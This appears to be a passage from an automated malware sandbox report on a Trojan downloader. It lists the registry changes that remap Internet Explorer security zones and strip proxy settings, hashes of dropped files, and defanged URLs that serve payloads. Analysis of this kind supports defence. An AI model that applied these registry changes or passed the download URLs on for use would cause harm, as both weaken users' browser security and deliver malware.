"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "10"

[HKLM\SOFTWARE\CashReminder]
"instid" = "iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "09 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 4C EA 4C 0D D9 83 98 8A 56 49 6F AA CE 7B F6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process CashReminder.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 92 EC 81 5A 8C 87 CA F7 BD 7B B4 FF 71 69 1F"

The process sc.exe:3420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 0A 7C 61 2F 5E 1B 7A 40 6F FD A7 72 9C 67 EE"

The process sc.exe:3396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 AA DC C5 15 43 95 4F B4 CB 0C 6C BA 0C 50 47"

The process GOSafer.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 28 0F 1C 07 20 99 82 DF C4 28 6A 2F C7 3F DD"

The process GOSafer.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "15"

[HKLM\SOFTWARE\GOSafer]
"instid" = "DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 E9 53 5B 15 46 BB 33 01 3B 58 18 1A C0 56 16"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process WNet.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\WNet]
"instid" = "ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D ED B9 45 D2 70 88 C1 67 43 28 77 A4 33 D4 B1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process WNet.exe:256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 3B 94 1E FA 7E 1E A7 0E D1 C3 18 5A 1B 24 D6"

The process 310714_is.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A EF 9A 22 6A 05 20 0C 70 D5 52 F7 DD 85 01 85"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 93 74 AB 1E 03 C8 80 36 92 56 66 C3 DE 67 56"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup5755__9664.exe" = "amisetup5755__9664"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
a5bfd6a87161d5dfa81cb5c2c6d29488 c:\Documents and Settings\"%CurrentUserName%"\Application Data\istartsurf\UninstallManager.exe
a96619564071df84cc892752df062a6d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe
3663b55452d8e814f62d6fae8eb32d65 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe
f94557f8fd41731a3d180383a516fbe3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe
86efd8c3d12bf831f3d2a7e29fe282aa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe
fddf4c9d5bdf47f6638a1405cab91044 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
1b99adddd28023e61c2a23c13cd855cf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe
d61776c4928db339475ab6a773585c9d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe
98c303ebdc2c29766000bc1bbb5e294b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe
a111ca5040df2e52a27baebb40cdf8f1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup5755__9664.exe
bbae2d7dac42f4ff6f172bb9ffe0d589 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp
84bcf3c71e70d5a6e9dc07d70466bdc3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq6.tmp\nsWeb.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\System.dll
d7a3fa6a6c738b4a3c40d5602af20b08 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\inetc.dll
84bcf3c71e70d5a6e9dc07d70466bdc3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\nsWeb.dll
2b7007ed0262ca02ef69d8990815cbeb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\registry.dll
d61776c4928db339475ab6a773585c9d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe
763cabe2b93e8a6ca951370ef5133e53 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1]
fddf4c9d5bdf47f6638a1405cab91044 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1]
1b99adddd28023e61c2a23c13cd855cf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe
5dbd356bff7e0a10e80866df96d47a78 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe
7a266046995398d1da3e6c3a98883bd0 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1]
98c303ebdc2c29766000bc1bbb5e294b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe
69bd671e58d7b29ea5493a880668a0e1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe
86efd8c3d12bf831f3d2a7e29fe282aa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1]
62f09521fa1665b5dbf4dcc444f4584d c:\Program Files\ActSys\ActSys.exe
50c806e582580511a38980168445a60f c:\Program Files\ActSys\ProtocolFilters.dll
bec584303ce252396a3731ce5bdcf03a c:\Program Files\ActSys\libeay32.dll
d8305b5c2810e2e135f87bb32d62810e c:\Program Files\ActSys\nfapi.dll
01b5780505301ada6dc102fb77b2298c c:\Program Files\ActSys\nfregdrv.exe
fb06f6889fe30a3effc5783ca305c59c c:\Program Files\ActSys\remove_ActSys.exe
da6f5524c9e5b5804dc5117022d08331 c:\Program Files\ActSys\ssleay32.dll
072ce8611b64cad10923f3fae7e52eda c:\Program Files\CashReminder\CashReminder.exe
d68a76ab1ebbbdde37bb12bd68b1639d c:\Program Files\CashReminder\ProtocolFilters.dll
bec584303ce252396a3731ce5bdcf03a c:\Program Files\CashReminder\libeay32.dll
d8305b5c2810e2e135f87bb32d62810e c:\Program Files\CashReminder\nfapi.dll
01b5780505301ada6dc102fb77b2298c c:\Program Files\CashReminder\nfregdrv.exe
da6f5524c9e5b5804dc5117022d08331 c:\Program Files\CashReminder\ssleay32.dll
c7eb85d39abb42efdd7b6c87de25a1dc c:\Program Files\CashReminder\uninstall.exe
9a0c59099f8589ee0f026bcd42c06800 c:\Program Files\GOSafer\ProtocolFilters.dll
c1908176b417b29dcfcfc15d7de9de63 c:\Program Files\GOSafer\gosafer.exe
3e1176c39139baf084e9a69d6d50438a c:\Program Files\GOSafer\libeay32.dll
0e2ca4f2d3f113f006d5801319a626de c:\Program Files\GOSafer\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files\GOSafer\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files\GOSafer\ssleay32.dll
e5dc41a4c742155c1af960fdf5e51ed6 c:\Program Files\GOSafer\uninst.exe
9a0c59099f8589ee0f026bcd42c06800 c:\Program Files\WNet\ProtocolFilters.dll
45571677457a9bfd49aadada0fd91ca8 c:\Program Files\WNet\WNet.exe
3e1176c39139baf084e9a69d6d50438a c:\Program Files\WNet\libeay32.dll
8249371485714e1f45a4b1c67002cf47 c:\Program Files\WNet\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files\WNet\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files\WNet\ssleay32.dll
f5d2e26b10a2b23d534e16a24375b051 c:\Program Files\WNet\uninst.exe
2cf2d758fe1109d055e9857f95a73cf8 c:\WINDOWS\system32\drivers\asfilterdrv.sys
e28c3440574068ccc3948d9ed9f3a047 c:\WINDOWS\system32\drivers\crfilterdrv.sys
649ac45992f39d9a04f3d629a872bd5c c:\WINDOWS\system32\drivers\gosaferdrv.sys
278c3df1efa1e09c4e55e7ddc59ab519 c:\WINDOWS\system32\drivers\ssfilterdrv.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright: q2g54WndLShXYB3BIA5JVf
Legal Trademarks:
Original Filename: q2g54WndLShXYB3BIA5J
Internal Name:
File Version: 7.8.5.9
File Description: Download da Internet
Comments: q2g54WndLShXYB3B
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23130 23552 4.44841 0bc2ffd32265a08d72b795b18265828d
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 110488 1024 3.26405 975304d6dd6c4a4f076b15511e2bbbc0
.ndata 147456 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 188416 3192 3584 2.80742 08b8765ebae57a11c951f075e7900c43

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 184
3e3cd94c5e6d1f1c66683d7bc29aaef7
fd798e8d7d88dc163e681f81144854ea
3330fd55d29f0d1fd88c36931d7e94b6
98dfb01f27d0d00488f3347c7bb0ef36
c6e528a31cafb6b2d33443512b8efc1f
c58fc13ddf9b7a2e8ca99386b9eb6c8f
e4c4cff1094fbff72aeb3e6827f69bc4
7241dc3f2a0b6ea61f4df85d751d7c03
f83816c5fd74f87663c27bc857c54c20
123d3a4485c9649b9f9ee387279725fa
2a2056e64caf8b79177ee628e97db231
641edaabefd4f46a0dc8caa8dae297cd
4363940d7485ca19ff5177e8c83389cc
173ab471842f45ba225c672a966fdfcc
7fe602114a76666ea973a5a22b4bceb7
55f6941611e6b5b5afe7a70dbb1b8bdb
ffe87a74a9ce198b2266dd8fdd67a3a3
5623ca722006ab792b8de36f6d6633ea
415ec116714b68e2101e52ee23129617
3156d35e3cfe3cd058e14cf42ec326eb
aac8203e17f1ba0429eb68f05f00ef5d
a8647af5a88fc0c6cfcf258906f302f4
2bec18f54db5c51eac6e210dba1ff40b
2143cb5872145360aa68b92bd7951843
5e0826607d791fed6050acb832441c67

URLs

URL IP
hxxp://198.50.209.4/registro/icone_cadeado.gif
hxxp://198.50.209.4/registro/top-line.gif
hxxp://www.nowtake.me/8Hk4o
hxxp://www.nowtake.me/010914s/010914i.htm
hxxp://www.nowtake.me/010914s/verificar_ip.php
hxxp://t1.extreme-dm.com/i.gif
hxxp://www.nowtake.me/310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://t1.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://www.4threquest.me/registro/310113f8.htm
hxxp://mobimidia.com/mobile/MobiMidia_validation.js
hxxp://mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA=
hxxp://mobimidia.com/mobile/mt-core.js
hxxp://www.nowtake.me/310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.nowtake.me/310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.nowtake.me/310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en
hxxp://www.tjepgz.cc/3517/1
hxxp://www.tjepgz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/namen.php
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/tdownload.php
hxxp://www.nowtake.me/310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://www.nowtake.me/registro/carregando.gif
hxxp://plainsavingscenter.com/mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y
hxxp://www.nowtake.me/310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N
hxxp://related.deals/services/stores?dummy=526
hxxp://related.deals/services/rules?dummy=212
hxxp://related.deals/services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120
hxxp://xa.xingcloud.com/v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.dlzip1.istartsurf.finish,9
hxxp://plainsavingscenter.com/fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw=
hxxp://goo.gl/Bw14Po
hxxp://plainsavingscenter.com/ii?alpha=U2xSOyMpaRAdPUgWfREsUigBNiNTMF4TLnZUE29sDGkDO3dGUF8tEQB3EC0RXjwOMAgQDGV/NA0TV2o3VjgrJVU5cBEhOwMzQT50KXp9FixQITs5KQYpBhVhM0EHdDhdP3peIQISTzxPJVtTOXR6fEocLiAYIU1jSWh3FTxTSFs4JCszViohFHZJPHYuaTpVJQ9xUnR+RmwHRSUzVgUvTRdiA3RzTlAOEg8EOBpoJH04CAhSVQQ8J2NGagN5MFM4LC0CaDFseHYPVScoKWwobRV0HBcNNCsaLkRbMyYATStmEStRbmBTUl8wFAJsEX4tWT5HCQYNTmN+Il8CY3dVFGZ4bhZ+N095dF4gAms0bDV7CzEbYFF0fltrAUcjNUEFO3kMbls9ZldDCV1HQS1QPWRQOQs/AQQXSWc2EzNAPyVOXHBiEWg6AERhU3QRfW85MmJYJQcuVipyDH9WAS4sAkx4P1crU3wrBhBYTT5bLEc3cXlwJGdVUBoqeT4bZ3U2aRVsOG8KYDAdU1ttTjUoInAxd1hVYh8qG2kRLQohXmJTEiwvM2RMaWNXTEI0OSQ+NmwwW2ojLAYVTyp5OkJ8VjlmWzg4cVg8QyJiPCYQEA==
